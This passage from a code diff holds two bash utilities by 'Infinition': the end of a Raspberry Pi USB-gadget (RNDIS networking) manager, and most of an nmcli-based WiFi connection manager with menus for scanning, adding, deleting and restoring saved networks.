sudo sed -i 's/rootwait/rootwait modules-load=dwc2,g_ether/' /boot/firmware/cmdline.txt
check_success "Added modules-load=dwc2,g_ether to /boot/firmware/cmdline.txt"
else
log "INFO" "modules-load=dwc2,g_ether already present in /boot/firmware/cmdline.txt"
fi
# Modify config.txt: Remove duplicate dtoverlay=dwc2 entries
log "INFO" "Cleaning up existing dtoverlay=dwc2 entries in /boot/firmware/config.txt"
sudo sed -i '/^dtoverlay=dwc2$/d' /boot/firmware/config.txt
check_success "Removed duplicate dtoverlay=dwc2 entries from /boot/firmware/config.txt"
# Append a single dtoverlay=dwc2 if not present
if ! grep -q "^dtoverlay=dwc2$" /boot/firmware/config.txt; then
echo "dtoverlay=dwc2" | sudo tee -a /boot/firmware/config.txt
check_success "Appended dtoverlay=dwc2 to /boot/firmware/config.txt"
else
log "INFO" "dtoverlay=dwc2 already present in /boot/firmware/config.txt"
fi
# Create USB gadget script
if [ ! -f /usr/local/bin/usb-gadget.sh ]; then
log "INFO" "Creating USB gadget script at /usr/local/bin/usb-gadget.sh"
cat > /usr/local/bin/usb-gadget.sh << 'EOF'
#!/bin/bash
set -e
# Enable debug mode for detailed logging
set -x
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1
echo 0x1d6b > idVendor
echo 0x0104 > idProduct
echo 0x0100 > bcdDevice
echo 0x0200 > bcdUSB
mkdir -p strings/0x409
echo "fedcba9876543210" > strings/0x409/serialnumber
echo "Raspberry Pi" > strings/0x409/manufacturer
echo "Pi Zero USB" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "Config 1: RNDIS Network" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
mkdir -p functions/rndis.usb0
# Remove existing symlink if it exists to prevent duplicates
if [ -L configs/c.1/rndis.usb0 ]; then
rm configs/c.1/rndis.usb0
fi
ln -s functions/rndis.usb0 configs/c.1/
# Ensure the device is not busy before listing available USB device controllers
max_retries=10
retry_count=0
while ! ls /sys/class/udc > UDC 2>/dev/null; do
if [ $retry_count -ge $max_retries ]; then
echo "Error: Device or resource busy after $max_retries attempts."
exit 1
fi
retry_count=$((retry_count + 1))
sleep 1
done
# Assign the USB Device Controller (UDC)
UDC_NAME=$(ls /sys/class/udc)
echo "$UDC_NAME" > UDC
echo "Assigned UDC: $UDC_NAME"
# Check if the usb0 interface is already configured
if ! ip addr show usb0 | grep -q "172.20.2.1"; then
ifconfig usb0 172.20.2.1 netmask 255.255.255.0
echo "Configured usb0 with IP 172.20.2.1"
else
echo "Interface usb0 already configured."
fi
EOF
chmod +x /usr/local/bin/usb-gadget.sh
check_success "Created and made USB gadget script executable at /usr/local/bin/usb-gadget.sh"
else
log "INFO" "USB gadget script /usr/local/bin/usb-gadget.sh already exists. Skipping creation."
fi
# Create USB gadget service
if [ ! -f /etc/systemd/system/usb-gadget.service ]; then
log "INFO" "Creating USB gadget systemd service at /etc/systemd/system/usb-gadget.service"
cat > /etc/systemd/system/usb-gadget.service << EOF
[Unit]
Description=USB Gadget Service
After=network.target
[Service]
ExecStartPre=/sbin/modprobe libcomposite
ExecStart=/usr/local/bin/usb-gadget.sh
Type=simple
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
EOF
check_success "Created USB gadget systemd service at /etc/systemd/system/usb-gadget.service"
else
log "INFO" "USB gadget systemd service /etc/systemd/system/usb-gadget.service already exists. Skipping creation."
fi
# Configure network interface: Remove duplicate entries first
log "INFO" "Cleaning up existing network interface configurations for usb0 in /etc/network/interfaces"
if grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
# Remove all lines starting with allow-hotplug usb0 and the following lines (iface and settings)
sudo sed -i '/^allow-hotplug usb0$/,/^$/d' /etc/network/interfaces
check_success "Removed existing network interface configurations for usb0 from /etc/network/interfaces"
else
log "INFO" "No existing network interface configuration for usb0 found in /etc/network/interfaces."
fi
# Append network interface configuration for usb0 if not already present
if ! grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
log "INFO" "Appending network interface configuration for usb0 to /etc/network/interfaces"
cat >> /etc/network/interfaces << EOF
allow-hotplug usb0
iface usb0 inet static
address 172.20.2.1
netmask 255.255.255.0
gateway 172.20.2.1
EOF
check_success "Appended network interface configuration for usb0 to /etc/network/interfaces"
else
log "INFO" "Network interface usb0 already configured in /etc/network/interfaces"
fi
# Reload systemd daemon and enable/start services
log "INFO" "Reloading systemd daemon"
systemctl daemon-reload
check_success "Reloaded systemd daemon"
log "INFO" "Enabling systemd-networkd service"
systemctl enable systemd-networkd
check_success "Enabled systemd-networkd service"
log "INFO" "Enabling usb-gadget service"
systemctl enable usb-gadget.service
check_success "Enabled usb-gadget service"
log "INFO" "Starting systemd-networkd service"
systemctl start systemd-networkd
check_success "Started systemd-networkd service"
log "INFO" "Starting usb-gadget service"
systemctl start usb-gadget.service
check_success "Started usb-gadget service"
log "SUCCESS" "USB Gadget installation completed successfully."
}
# ============================================================
# Function to Uninstall USB Gadget
# ============================================================
uninstall_usb_gadget() {
log "INFO" "Starting USB Gadget uninstallation..."
# Ensure the script is run as root
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This script must be run as root. Please use 'sudo'."
exit 1
fi
# Stop and disable USB gadget service
if systemctl is-active --quiet usb-gadget.service; then
systemctl stop usb-gadget.service
check_success "Stopped usb-gadget.service"
else
log "INFO" "usb-gadget.service is not running."
fi
if systemctl is-enabled --quiet usb-gadget.service; then
systemctl disable usb-gadget.service
check_success "Disabled usb-gadget.service"
else
log "INFO" "usb-gadget.service is not enabled."
fi
# Remove USB gadget service file
if [ -f /etc/systemd/system/usb-gadget.service ]; then
rm /etc/systemd/system/usb-gadget.service
check_success "Removed /etc/systemd/system/usb-gadget.service"
else
log "INFO" "/etc/systemd/system/usb-gadget.service does not exist. Skipping removal."
fi
# Remove USB gadget script
if [ -f /usr/local/bin/usb-gadget.sh ]; then
rm /usr/local/bin/usb-gadget.sh
check_success "Removed /usr/local/bin/usb-gadget.sh"
else
log "INFO" "/usr/local/bin/usb-gadget.sh does not exist. Skipping removal."
fi
# Restore cmdline.txt and config.txt from backups
if [ -f /boot/firmware/cmdline.txt.bak ]; then
cp /boot/firmware/cmdline.txt.bak /boot/firmware/cmdline.txt
chmod 644 /boot/firmware/cmdline.txt
check_success "Restored /boot/firmware/cmdline.txt from backup"
else
log "WARNING" "Backup /boot/firmware/cmdline.txt.bak not found. Skipping restoration."
fi
if [ -f /boot/firmware/config.txt.bak ]; then
cp /boot/firmware/config.txt.bak /boot/firmware/config.txt
check_success "Restored /boot/firmware/config.txt from backup"
else
log "WARNING" "Backup /boot/firmware/config.txt.bak not found. Skipping restoration."
fi
# Remove network interface configuration for usb0: Remove all related lines
if grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
log "INFO" "Removing network interface configuration for usb0 from /etc/network/interfaces"
# Remove lines from allow-hotplug usb0 up to the next empty line
sudo sed -i '/^allow-hotplug usb0$/,/^$/d' /etc/network/interfaces
check_success "Removed network interface configuration for usb0 from /etc/network/interfaces"
else
log "INFO" "Network interface usb0 not found in /etc/network/interfaces. Skipping removal."
fi
# Reload systemd daemon
log "INFO" "Reloading systemd daemon"
systemctl daemon-reload
check_success "Reloaded systemd daemon"
# Disable and stop systemd-networkd service
if systemctl is-active --quiet systemd-networkd; then
systemctl stop systemd-networkd
check_success "Stopped systemd-networkd service"
else
log "INFO" "systemd-networkd service is not running."
fi
if systemctl is-enabled --quiet systemd-networkd; then
systemctl disable systemd-networkd
check_success "Disabled systemd-networkd service"
else
log "INFO" "systemd-networkd service is not enabled."
fi
# Clean up any remaining duplicate entries in cmdline.txt and config.txt
log "INFO" "Ensuring no duplicate entries remain in configuration files."
# Remove any remaining modules-load=dwc2,g_rndis and modules-load=dwc2,g_ether
sudo sed -i '/modules-load=dwc2,g_rndis/d' /boot/firmware/cmdline.txt
sudo sed -i '/modules-load=dwc2,g_ether/d' /boot/firmware/cmdline.txt
# Remove any remaining dtoverlay=dwc2
sudo sed -i '/^dtoverlay=dwc2$/d' /boot/firmware/config.txt
log "INFO" "Cleaned up duplicate entries in /boot/firmware/cmdline.txt and /boot/firmware/config.txt"
log "SUCCESS" "USB Gadget uninstallation completed successfully."
}
# ============================================================
# Function to List USB Gadget Information
# ============================================================
list_usb_gadget_info() {
echo -e "${CYAN}===== USB Gadget Information =====${NC}"
# Check status of usb-gadget service
echo -e "\n${YELLOW}Service Status:${NC}"
if systemctl list-units --type=service | grep -q usb-gadget.service; then
systemctl status usb-gadget.service --no-pager
else
echo -e "${RED}usb-gadget.service is not installed.${NC}"
fi
# Check if USB gadget script exists
echo -e "\n${YELLOW}USB Gadget Script:${NC}"
if [ -f /usr/local/bin/usb-gadget.sh ]; then
echo -e "${GREEN}/usr/local/bin/usb-gadget.sh exists.${NC}"
else
echo -e "${RED}/usr/local/bin/usb-gadget.sh does not exist.${NC}"
fi
# Check network interface configuration
echo -e "\n${YELLOW}Network Interface Configuration for usb0:${NC}"
if grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
grep "^allow-hotplug usb0" /etc/network/interfaces -A 4
else
echo -e "${RED}No network interface configuration found for usb0.${NC}"
fi
# Check cmdline.txt
echo -e "\n${YELLOW}/boot/firmware/cmdline.txt:${NC}"
if grep -q "modules-load=dwc2,g_rndis" /boot/firmware/cmdline.txt && grep -q "modules-load=dwc2,g_ether" /boot/firmware/cmdline.txt; then
echo -e "${GREEN}modules-load=dwc2,g_rndis and modules-load=dwc2,g_ether are present.${NC}"
else
echo -e "${RED}modules-load=dwc2,g_rndis and/or modules-load=dwc2,g_ether are not present.${NC}"
fi
# Check config.txt
echo -e "\n${YELLOW}/boot/firmware/config.txt:${NC}"
if grep -q "^dtoverlay=dwc2" /boot/firmware/config.txt; then
echo -e "${GREEN}dtoverlay=dwc2 is present.${NC}"
else
echo -e "${RED}dtoverlay=dwc2 is not present.${NC}"
fi
# Check if systemd-networkd is enabled
echo -e "\n${YELLOW}systemd-networkd Service:${NC}"
if systemctl is-enabled --quiet systemd-networkd; then
systemctl is-active systemd-networkd && echo -e "${GREEN}systemd-networkd is active.${NC}" || echo -e "${RED}systemd-networkd is inactive.${NC}"
else
echo -e "${RED}systemd-networkd is not enabled.${NC}"
fi
echo -e "\n===== End of Information ====="
}
# ============================================================
# Function to Display the Main Menu
# ============================================================
display_main_menu() {
while true; do
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE}║ USB Gadget Manager Menu by Infinition ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
echo -e "${BLUE}${NC} 1. Install USB Gadget ${BLUE}${NC}"
echo -e "${BLUE}${NC} 2. Uninstall USB Gadget ${BLUE}${NC}"
echo -e "${BLUE}${NC} 3. List USB Gadget Information ${BLUE}${NC}"
echo -e "${BLUE}${NC} 4. Show Help ${BLUE}${NC}"
echo -e "${BLUE}${NC} 5. Exit ${BLUE}${NC}"
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo -e "Note: Ensure you run this script as root."
echo -e "${YELLOW}Usage: $0 [OPTIONS] (use -h for help)${NC}"
echo -n -e "${GREEN}Please choose an option (1-5): ${NC}"
read choice
case $choice in
1)
install_usb_gadget
echo ""
read -p "Press Enter to return to the menu..."
;;
2)
uninstall_usb_gadget
echo ""
read -p "Press Enter to return to the menu..."
;;
3)
list_usb_gadget_info
echo ""
read -p "Press Enter to return to the menu..."
;;
4)
show_usage
;;
5)
log "INFO" "Exiting USB Gadget Manager. Goodbye!"
exit 0
;;
*)
log "ERROR" "Invalid option. Please choose between 1-5."
sleep 2
;;
esac
done
}
# ============================================================
# Process Command Line Arguments
# ============================================================
while getopts ":fulh" opt; do
case $opt in
f)
install_usb_gadget
exit 0
;;
u)
uninstall_usb_gadget
exit 0
;;
l)
list_usb_gadget_info
exit 0
;;
h)
show_usage
;;
\?)
echo -e "${RED}Invalid option: -$OPTARG${NC}" >&2
show_usage
;;
esac
done
# ============================================================
# Main Execution
# ============================================================
# If no arguments are provided, display the menu
if [ $OPTIND -eq 1 ]; then
display_main_menu
fi

786
bjorn_wifi.sh Normal file
View File

@@ -0,0 +1,786 @@
#!/bin/bash
# WiFi Manager Script Using nmcli
# Author: Infinition
# Version: 1.6
# Description: This script provides a simple menu interface to manage WiFi connections using nmcli.
# ============================================================
# Colors for Output
# ============================================================
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
PURPLE='\033[0;35m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color
# ============================================================
# Logging Function
# ============================================================
log() {
local level=$1
shift
case $level in
"INFO") echo -e "${GREEN}[INFO]${NC} $*" ;;
"WARN") echo -e "${YELLOW}[WARN]${NC} $*" ;;
"ERROR") echo -e "${RED}[ERROR]${NC} $*" ;;
"DEBUG") echo -e "${BLUE}[DEBUG]${NC} $*" ;;
esac
}
# ============================================================
# Check if Script is Run as Root
# ============================================================
if [ "$EUID" -ne 0 ]; then
log "ERROR" "This script must be run as root."
exit 1
fi
# ============================================================
# Function to Show Usage
# ============================================================
show_usage() {
echo -e "${GREEN}Usage: $0 [OPTIONS]${NC}"
echo -e "Options:"
echo -e " ${BLUE}-h${NC} Show this help message"
echo -e " ${BLUE}-f${NC} Force refresh of WiFi connections"
echo -e " ${BLUE}-c${NC} Clear all saved WiFi connections"
echo -e " ${BLUE}-l${NC} List all available WiFi networks"
echo -e " ${BLUE}-s${NC} Show current WiFi status"
echo -e " ${BLUE}-a${NC} Add a new WiFi connection"
echo -e " ${BLUE}-d${NC} Delete a WiFi connection"
echo -e " ${BLUE}-m${NC} Manage WiFi Connections"
echo -e ""
echo -e "Example: $0 -a"
exit 1
}
# ============================================================
# Function to Check Prerequisites
# ============================================================
check_prerequisites() {
log "INFO" "Checking prerequisites..."
local missing_packages=()
# Check if nmcli is installed
if ! command -v nmcli &> /dev/null; then
missing_packages+=("network-manager")
fi
# Check if NetworkManager service is running
if ! systemctl is-active --quiet NetworkManager; then
log "WARN" "NetworkManager service is not running. Attempting to start it..."
systemctl start NetworkManager
sleep 2
if ! systemctl is-active --quiet NetworkManager; then
log "ERROR" "Failed to start NetworkManager. Please install and start it manually."
exit 1
else
log "INFO" "NetworkManager started successfully."
fi
fi
# Install missing packages if any
if [ ${#missing_packages[@]} -gt 0 ]; then
log "WARN" "Missing packages: ${missing_packages[*]}"
log "INFO" "Attempting to install missing packages..."
apt-get update
apt-get install -y "${missing_packages[@]}"
# Verify installation
for package in "${missing_packages[@]}"; do
if ! dpkg -l | grep -q "^ii.*$package"; then
log "ERROR" "Failed to install $package."
exit 1
fi
done
fi
log "INFO" "All prerequisites are met."
}
# ============================================================
# Function to Handle preconfigured.nmconnection
# ============================================================
handle_preconfigured_connection() {
preconfigured_file="/etc/NetworkManager/system-connections/preconfigured.nmconnection"
if [ -f "$preconfigured_file" ]; then
echo -e "${YELLOW}A preconfigured WiFi connection exists (preconfigured.nmconnection).${NC}"
echo -n -e "${GREEN}Do you want to delete it and recreate connections with individual SSIDs? (y/n): ${NC}"
read confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
# Extract SSID from preconfigured.nmconnection
ssid=$(grep "^ssid=" "$preconfigured_file" | cut -d'=' -f2 | tr -d '"')
if [ -z "$ssid" ]; then
log "WARN" "SSID not found in preconfigured.nmconnection. Cannot recreate connection."
else
# Extract security type
security=$(grep "^security=" "$preconfigured_file" | cut -d'=' -f2 | tr -d '"')
# Delete preconfigured.nmconnection
log "INFO" "Deleting preconfigured.nmconnection..."
rm "$preconfigured_file"
systemctl restart NetworkManager
sleep 2
# Recreate the connection with SSID name
echo -n -e "${GREEN}Do you want to recreate the connection for SSID '$ssid'? (y/n): ${NC}"
read recreate_confirm
if [[ "$recreate_confirm" =~ ^[Yy]$ ]]; then
# Check if connection already exists
if nmcli connection show "$ssid" &> /dev/null; then
log "WARN" "A connection named '$ssid' already exists."
else
# Prompt for password if necessary
if [ "$security" == "none" ] || [ "$security" == "--" ] || [ -z "$security" ]; then
# Open network
log "INFO" "Creating open connection for SSID '$ssid'..."
nmcli device wifi connect "$ssid" name "$ssid"
else
# Secured network
echo -n -e "${GREEN}Enter WiFi Password for '$ssid': ${NC}"
read -s password
echo ""
if [ -z "$password" ]; then
log "ERROR" "Password cannot be empty."
else
log "INFO" "Creating secured connection for SSID '$ssid'..."
nmcli device wifi connect "$ssid" password "$password" name "$ssid"
fi
fi
if [ $? -eq 0 ]; then
log "INFO" "Successfully recreated connection for '$ssid'."
else
log "ERROR" "Failed to recreate connection for '$ssid'."
fi
fi
else
log "INFO" "Connection recreation cancelled."
fi
fi
else
log "INFO" "Preconfigured connection retained."
fi
fi
}
# ============================================================
# Function to List All Available WiFi Networks and Connect
# ============================================================
list_wifi_and_connect() {
log "INFO" "Scanning for available WiFi networks..."
nmcli device wifi rescan
sleep 2
while true; do
clear
available_networks=$(nmcli -t -f SSID,SECURITY device wifi list)
if [ -z "$available_networks" ]; then
log "WARN" "No WiFi networks found."
echo ""
else
# Remove lines with empty SSIDs (hidden networks)
network_list=$(echo "$available_networks" | grep -v '^:$')
if [ -z "$network_list" ]; then
log "WARN" "No visible WiFi networks found."
echo ""
else
echo -e "${CYAN}Available WiFi Networks:${NC}"
declare -A SSIDs
declare -A SECURITIES
index=1
while IFS=: read -r ssid security; do
# Handle hidden SSIDs
if [ -z "$ssid" ]; then
ssid="<Hidden SSID>"
fi
SSIDs["$index"]="$ssid"
SECURITIES["$index"]="$security"
printf "%d. %-40s (%s)\n" "$index" "$ssid" "$security"
index=$((index + 1))
done <<< "$network_list"
fi
fi
echo ""
echo -e "${YELLOW}The list will refresh every 5 seconds. Press 'c' to connect, enter a number to connect, or 'q' to quit.${NC}"
echo -n -e "${GREEN}Enter choice (number/c/q): ${NC}"
read -t 5 input
if [ $? -eq 0 ]; then
if [[ "$input" =~ ^[Qq]$ ]]; then
log "INFO" "Exiting WiFi list."
return
elif [[ "$input" =~ ^[Cc]$ ]]; then
# Handle connection via 'c'
echo ""
echo -n -e "${GREEN}Enter the number of the network to connect: ${NC}"
read selection
if [[ -z "$selection" ]]; then
log "INFO" "Operation cancelled."
continue
fi
# Validate selection
if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection. Please enter a valid number."
sleep 2
continue
fi
max_index=$((index - 1))
if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
sleep 2
continue
fi
ssid_selected="${SSIDs[$selection]}"
security_selected="${SECURITIES[$selection]}"
echo -n -e "${GREEN}Do you want to connect to '$ssid_selected'? (y/n): ${NC}"
read confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
if [ "$security_selected" == "--" ] || [ -z "$security_selected" ]; then
# Open network
log "INFO" "Connecting to open network '$ssid_selected'..."
nmcli device wifi connect "$ssid_selected" name "$ssid_selected"
else
# Secured network
echo -n -e "${GREEN}Enter WiFi Password for '$ssid_selected': ${NC}"
read -s password
echo ""
if [ -z "$password" ]; then
log "ERROR" "Password cannot be empty."
sleep 2
continue
fi
log "INFO" "Connecting to '$ssid_selected'..."
nmcli device wifi connect "$ssid_selected" password "$password" name "$ssid_selected"
fi
if [ $? -eq 0 ]; then
log "INFO" "Successfully connected to '$ssid_selected'."
else
log "ERROR" "Failed to connect to '$ssid_selected'."
fi
else
log "INFO" "Operation cancelled."
fi
echo ""
read -p "Press Enter to continue..."
elif [[ "$input" =~ ^[0-9]+$ ]]; then
# Handle connection via number
selection="$input"
# Validate selection
if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection. Please enter a valid number."
sleep 2
continue
fi
max_index=$((index - 1))
if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
sleep 2
continue
fi
ssid_selected="${SSIDs[$selection]}"
security_selected="${SECURITIES[$selection]}"
echo -n -e "${GREEN}Do you want to connect to '$ssid_selected'? (y/n): ${NC}"
read confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
if [ "$security_selected" == "--" ] || [ -z "$security_selected" ]; then
# Open network
log "INFO" "Connecting to open network '$ssid_selected'..."
nmcli device wifi connect "$ssid_selected" name "$ssid_selected"
else
# Secured network
echo -n -e "${GREEN}Enter WiFi Password for '$ssid_selected': ${NC}"
read -s password
echo ""
if [ -z "$password" ]; then
log "ERROR" "Password cannot be empty."
sleep 2
continue
fi
log "INFO" "Connecting to '$ssid_selected'..."
nmcli device wifi connect "$ssid_selected" password "$password" name "$ssid_selected"
fi
if [ $? -eq 0 ]; then
log "INFO" "Successfully connected to '$ssid_selected'."
else
log "ERROR" "Failed to connect to '$ssid_selected'."
fi
else
log "INFO" "Operation cancelled."
fi
echo ""
read -p "Press Enter to continue..."
else
log "ERROR" "Invalid input."
sleep 2
fi
fi
done
}
# ============================================================
# Function to Show Current WiFi Status
# ============================================================
show_wifi_status() {
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE}║ Current WiFi Status ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
# Check if WiFi is enabled
wifi_enabled=$(nmcli radio wifi)
echo -e "▶ WiFi Enabled : ${wifi_enabled}"
# Show active connection
# Remplacer SSID par NAME
active_conn=$(nmcli -t -f ACTIVE,NAME connection show --active | grep '^yes' | cut -d':' -f2)
if [ -n "$active_conn" ]; then
echo -e "▶ Connected to : ${GREEN}$active_conn${NC}"
else
echo -e "▶ Connected to : ${RED}Not Connected${NC}"
fi
# Show all saved connections
echo -e "\n${CYAN}Saved WiFi Connections:${NC}"
nmcli connection show | grep wifi
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Add a New WiFi Connection
# ============================================================
add_wifi_connection() {
echo -e "${CYAN}Add a New WiFi Connection${NC}"
echo -n "Enter SSID (Network Name): "
read ssid
echo -n "Enter WiFi Password (leave empty for open network): "
read -s password
echo ""
if [ -z "$ssid" ]; then
log "ERROR" "SSID cannot be empty."
sleep 2
return
fi
if [ -n "$password" ]; then
log "INFO" "Adding new WiFi connection for SSID: $ssid"
nmcli device wifi connect "$ssid" password "$password" name "$ssid"
else
log "INFO" "Adding new open WiFi connection for SSID: $ssid"
nmcli device wifi connect "$ssid" --ask name "$ssid"
fi
if [ $? -eq 0 ]; then
log "INFO" "Successfully connected to '$ssid'."
else
log "ERROR" "Failed to connect to '$ssid'."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Delete a WiFi Connection
# ============================================================
delete_wifi_connection() {
echo -e "${CYAN}Delete a WiFi Connection${NC}"
# Correctly filter connections by type '802-11-wireless'
connections=$(nmcli -t -f NAME,TYPE connection show | awk -F: '$2 == "802-11-wireless" {print $1}')
if [ -z "$connections" ]; then
log "WARN" "No WiFi connections available to delete."
echo ""
read -p "Press Enter to return to the menu..."
return
fi
echo -e "${CYAN}Available WiFi Connections:${NC}"
index=1
declare -A CONNECTIONS
while IFS= read -r conn; do
echo -e "$index. $conn"
CONNECTIONS["$index"]="$conn"
index=$((index + 1))
done <<< "$connections"
echo ""
echo -n -e "${GREEN}Enter the number of the connection to delete (or press Enter to cancel): ${NC}"
read selection
if [[ -z "$selection" ]]; then
log "INFO" "Operation cancelled."
sleep 1
return
fi
# Validate selection
if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection. Please enter a valid number."
sleep 2
return
fi
max_index=$((index - 1))
if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
sleep 2
return
fi
conn_name="${CONNECTIONS[$selection]}"
# Backup the connection before deletion
backup_dir="$HOME/wifi_connection_backups"
mkdir -p "$backup_dir"
backup_file="$backup_dir/${conn_name}.nmconnection"
if nmcli connection show "$conn_name" &> /dev/null; then
log "INFO" "Backing up connection '$conn_name'..."
cp "/etc/NetworkManager/system-connections/$conn_name.nmconnection" "$backup_file" 2>/dev/null
if [ $? -eq 0 ]; then
log "INFO" "Backup saved to '$backup_file'."
else
log "WARN" "Failed to backup connection. It might not be a preconfigured connection or backup location is inaccessible."
fi
else
log "WARN" "Connection '$conn_name' does not exist or cannot be backed up."
fi
log "INFO" "Deleting WiFi connection: $conn_name"
nmcli connection delete "$conn_name"
if [ $? -eq 0 ]; then
log "INFO" "Successfully deleted '$conn_name'."
else
log "ERROR" "Failed to delete '$conn_name'."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Clear All Saved WiFi Connections
# ============================================================
clear_all_connections() {
echo -e "${YELLOW}Are you sure you want to delete all saved WiFi connections? (y/n): ${NC}"
read confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
log "INFO" "Deleting all saved WiFi connections..."
connections=$(nmcli -t -f NAME,TYPE connection show | awk -F: '$2 == "802-11-wireless" {print $1}')
for conn in $connections; do
# Backup before deletion
backup_dir="$HOME/wifi_connection_backups"
mkdir -p "$backup_dir"
backup_file="$backup_dir/${conn}.nmconnection"
if nmcli connection show "$conn" &> /dev/null; then
cp "/etc/NetworkManager/system-connections/$conn.nmconnection" "$backup_file" 2>/dev/null
if [ $? -eq 0 ]; then
log "INFO" "Backup saved to '$backup_file'."
else
log "WARN" "Failed to backup connection '$conn'."
fi
fi
nmcli connection delete "$conn"
log "INFO" "Deleted connection: $conn"
done
log "INFO" "All saved WiFi connections have been deleted."
else
log "INFO" "Operation cancelled."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Manage WiFi Connections
# ============================================================
manage_wifi_connections() {
while true; do
clear
echo -e "${CYAN}Manage WiFi Connections${NC}"
echo -e "1. List WiFi Connections"
echo -e "2. Delete a WiFi Connection"
echo -e "3. Recreate a WiFi Connection from Backup"
echo -e "4. Back to Main Menu"
echo -n -e "${GREEN}Choose an option (1-4): ${NC}"
read choice
case $choice in
1)
# List WiFi connections
clear
echo -e "${CYAN}Saved WiFi Connections:${NC}"
nmcli -t -f NAME,TYPE connection show | awk -F: '$2 == "802-11-wireless" {print $1}'
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
;;
2)
delete_wifi_connection
;;
3)
# Liste des sauvegardes disponibles
backup_dir="$HOME/wifi_connection_backups"
if [ ! -d "$backup_dir" ]; then
log "WARN" "No backup directory found at '$backup_dir'."
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
continue
fi
backups=("$backup_dir"/*.nmconnection)
if [ ${#backups[@]} -eq 0 ]; then
log "WARN" "No backup files found in '$backup_dir'."
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
continue
fi
echo -e "${CYAN}Available WiFi Connection Backups:${NC}"
index=1
declare -A BACKUPS
for backup in "${backups[@]}"; do
backup_name=$(basename "$backup" .nmconnection)
echo -e "$index. $backup_name"
BACKUPS["$index"]="$backup_name"
index=$((index + 1))
done
echo ""
echo -n -e "${GREEN}Enter the number of the connection to recreate (or press Enter to cancel): ${NC}"
read selection
if [[ -z "$selection" ]]; then
log "INFO" "Operation cancelled."
sleep 1
continue
fi
# Validate selection
if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection. Please enter a valid number."
sleep 2
continue
fi
max_index=$((index - 1))
if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
sleep 2
continue
fi
conn_name="${BACKUPS[$selection]}"
backup_file="$backup_dir/${conn_name}.nmconnection"
# Vérifier que le fichier de sauvegarde existe
if [ ! -f "$backup_file" ]; then
log "ERROR" "Backup file '$backup_file' does not exist."
sleep 2
continue
fi
log "INFO" "Recreating connection '$conn_name' from backup..."
cp "$backup_file" "/etc/NetworkManager/system-connections/" 2>/dev/null
if [ $? -ne 0 ]; then
log "ERROR" "Failed to copy backup file to NetworkManager directory. Check permissions."
sleep 2
continue
fi
# Set correct permissions
chmod 600 "/etc/NetworkManager/system-connections/$conn_name.nmconnection"
# Reload NetworkManager connections
nmcli connection reload
# Bring the connection up
nmcli connection up "$conn_name"
if [ $? -eq 0 ]; then
log "INFO" "Successfully recreated and connected to '$conn_name'."
else
log "ERROR" "Failed to recreate and connect to '$conn_name'."
fi
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
;;
4)
log "INFO" "Returning to Main Menu."
return
;;
*)
log "ERROR" "Invalid option."
sleep 2
;;
esac
done
}
# ============================================================
# Function to Force Refresh WiFi Connections
# ============================================================
force_refresh_wifi_connections() {
log "INFO" "Refreshing WiFi connections..."
nmcli connection reload
# Identify the WiFi device (e.g., wlan0, wlp2s0)
wifi_device=$(nmcli device status | awk '$2 == "wifi" {print $1}')
if [ -n "$wifi_device" ]; then
nmcli device disconnect "$wifi_device"
nmcli device connect "$wifi_device"
log "INFO" "WiFi connections have been refreshed."
else
log "WARN" "No WiFi device found to refresh."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Display the Main Menu
# ============================================================
display_main_menu() {
while true; do
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE}║ Wifi Manager Menu by Infinition ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
echo -e "${BLUE}${NC} 1. List Available WiFi Networks ${BLUE}${NC}"
echo -e "${BLUE}${NC} 2. Show Current WiFi Status ${BLUE}${NC}"
echo -e "${BLUE}${NC} 3. Add a New WiFi Connection ${BLUE}${NC}"
echo -e "${BLUE}${NC} 4. Delete a WiFi Connection ${BLUE}${NC}"
